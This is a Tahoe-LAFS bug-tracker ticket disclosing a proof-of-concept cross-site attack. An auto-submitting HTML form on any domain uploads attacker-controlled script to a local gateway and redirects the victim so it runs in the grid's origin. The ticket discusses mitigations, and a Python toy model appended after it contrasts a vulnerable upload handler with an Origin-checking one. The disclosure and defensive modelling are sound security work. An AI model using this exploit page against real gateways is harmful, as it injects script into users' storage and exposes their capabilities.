[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
tahoe-lafs
trac at tahoe-lafs.org
Thu Nov 15 02:47:14 UTC 2012
#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
----------------------+----------------------------
Reporter: nejucomo | Owner: davidsarah
Type: defect | Status: new
Priority: normal | Milestone: undecided
Component: unknown | Version: 1.9.2
Keywords: | Launchpad Bug:
----------------------+----------------------------
**Proof of Concept Attack**
The following proof of concept shows how an HTML file loaded from any
domain into (some) browsers with JavaScript enabled can inject an attacker
controlled script into a grid, and *then* cause the user to execute that
script in the domain of the grid:
{{{
<html>
<head>
<script>
// Attacker-controlled HTML: this string becomes the body of the file that is
// uploaded to the grid and later served back from the gateway's own origin.
var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';
window.onload = function () {
    // Put the payload into the "file" field and auto-submit the form; no
    // user interaction is needed beyond loading this page.
    var payload_input = document.getElementById('payload_input');
    payload_input.value = PAYLOAD;
    var the_form = document.getElementById('the_form');
    the_form.submit();
};
</script>
</head>
<body id="body">
<p>
demo attack:
</p>
<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>
<!-- Cross-origin multipart POST to the local gateway. The %25(uri)s in
     when_done decodes to %(uri)s, which the gateway replaces with the cap of
     the freshly uploaded file before redirecting the browser there. -->
<form id="the_form"
      method="POST"
      action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
      enctype="multipart/form-data"
>
<input id="payload_input" type="text" name="file">
</form>
</body>
</html>
}}}
**Mitigations**:
There are several moving parts at work here. The {{{when_done}}}
parameter with uri substitution was very convenient.
I think an upload capability would be the most consistent and thorough
solution. Removing bits and pieces which may otherwise be useful, like
{{{when_done}}}, feels like a piecemeal defense.
Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
with the rest of the capability model. (A CSRF token would be a bit like
a "make this kind of HTTP request" temporary capability.)
**Related Tickets**:
* #615 is more about bootstrapping an attack rather than illicitly
gaining victim capabilities.
* #1215 is about adding CORS support and how that may create a
vulnerability; this script demonstrates even without CORS support similar
vulnerabilities already exist.
--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage
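The two moving parts the ticket describes, a cross-origin form POST the gateway accepts without checking where it came from, and a {{{when_done}}} redirect whose target is chosen by the party that built the form, can be modelled without a browser or a grid. The following is an added example, not Tahoe-LAFS's webapi code and not the reporter's PoC: a toy gateway with a {{{vulnerable_upload}}} handler that behaves the way the PoC relies on, and a {{{hardened_upload}}} handler that refuses the POST unless the Origin (or Referer) header names the gateway itself. The Origin check is a stand-in for the CSRF defence the ticket discusses, not the ticket's own proposal; the cap format, request/response classes and the attacker page {{{http://attacker.example}}} are all constructed for the example.

```python
"""Toy model of the #1859 request flow (example code, not Tahoe-LAFS's webapi)."""
import hashlib
from dataclasses import dataclass, field
from typing import Callable, Dict
from urllib.parse import parse_qs, urlsplit

GATEWAY_ORIGIN = "http://127.0.0.1:3456"  # gateway address used in the PoC form action


@dataclass
class Request:
    method: str
    url: str                                         # path + query, as in the form's action
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


class ToyGrid:
    """Stand-in for the storage grid: bytes addressed by a made-up cap string."""

    def __init__(self) -> None:
        self.store: Dict[str, bytes] = {}

    def upload(self, data: bytes) -> str:
        cap = "URI:CHK:" + hashlib.sha256(data).hexdigest()[:26]  # hypothetical cap format
        self.store[cap] = data
        return cap


def _query(req: Request) -> Dict[str, str]:
    # parse_qs decodes %25 -> %, so when_done arrives as "/uri/%(uri)s?filename=..."
    return {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}


def vulnerable_upload(grid: ToyGrid, req: Request) -> Response:
    """Behaviour the PoC relies on: no origin check, when_done substitution, redirect."""
    cap = grid.upload(req.form["file"].encode())
    when_done = _query(req).get("when_done")
    if when_done is not None:
        # "%(uri)s" is replaced with the new cap, so whoever wrote the form
        # decides where the victim's browser goes next: here, the payload itself.
        return Response(303, {"Location": when_done % {"uri": cap}})
    return Response(200, {"Content-Type": "text/plain"}, cap)


def same_origin(req: Request) -> bool:
    """True only if Origin (or, failing that, Referer) names the gateway itself."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False  # treat a missing source as foreign rather than trusted
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == GATEWAY_ORIGIN


def hardened_upload(grid: ToyGrid, req: Request) -> Response:
    """Same handler, but a cross-site POST is refused before anything is stored."""
    if not same_origin(req):
        return Response(403, {"Content-Type": "text/plain"}, "cross-origin upload refused")
    return vulnerable_upload(grid, req)


def follow_redirect(grid: ToyGrid, resp: Response) -> Response:
    """GET /uri/<cap>?filename=payload.html: the gateway serves the stored HTML as HTML."""
    path = urlsplit(resp.headers["Location"]).path
    cap = path[len("/uri/"):]
    return Response(200, {"Content-Type": "text/html"}, grid.store[cap].decode())


def run_attack(handler: Callable[[ToyGrid, Request], Response],
               origin: str = "http://attacker.example") -> Response:
    """Simulate the PoC form submission from a page hosted at `origin` (constructed)."""
    grid = ToyGrid()
    req = Request(
        method="POST",
        url="/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html",
        headers={"Origin": origin},
        form={"file": "<html><head><script>alert(document.domain)</script></head></html>"},
    )
    resp = handler(grid, req)
    return follow_redirect(grid, resp) if resp.status == 303 else resp


if __name__ == "__main__":
    print(run_attack(vulnerable_upload))   # 200 text/html carrying the attacker's script
    print(run_attack(hardened_upload))     # 403 before the payload is stored
```

Against {{{vulnerable_upload}}} the simulated victim ends up on a {{{text/html}}} response from the gateway origin whose body is the attacker's script, which is exactly the outcome the PoC demonstrates; {{{hardened_upload}}} stops the chain at the first request, while a submission whose Origin is the gateway itself still goes through. Note that the check only helps in browsers that actually send Origin or Referer on cross-site form POSTs, which is why the ticket's capability-based alternative (an upload capability rather than an open endpoint) is the more general fix.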